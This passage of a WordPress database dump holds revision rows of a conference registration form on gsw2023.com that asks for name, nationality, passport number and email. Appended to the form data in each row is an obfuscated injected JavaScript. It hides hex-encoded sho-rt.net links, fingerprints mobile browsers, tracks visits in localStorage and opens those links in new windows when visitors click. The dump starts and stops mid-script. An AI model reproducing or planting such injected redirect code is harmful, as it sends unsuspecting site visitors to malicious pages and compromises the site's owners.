_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 23:04:53','2023-08-20 23:04:53','',5345,'https://gsw2023.com/?p=5361',0,'revision','',0),
(5362,1,'2023-08-20 23:13:03','2023-08-20 23:13:03','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"text\",\"label\":\"Affiliation\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":9,\"settings\":{\"form_title\":\"Please Fill Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"providers\":{\"constant-contact\":{\"connection_64e29c8d4b07f\":{\"connection_name\":\"contact form\"}}},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 23:13:03','2023-08-20 23:13:03','',5345,'https://gsw2023.com/?p=5362',0,'revision','',0),
(5363,1,'2023-08-20 23:21:58','2023-08-20 23:21:58','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"text\",\"label\":\"Affiliation\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":9,\"settings\":{\"form_title\":\"Please Fill Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us<\\/p>\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 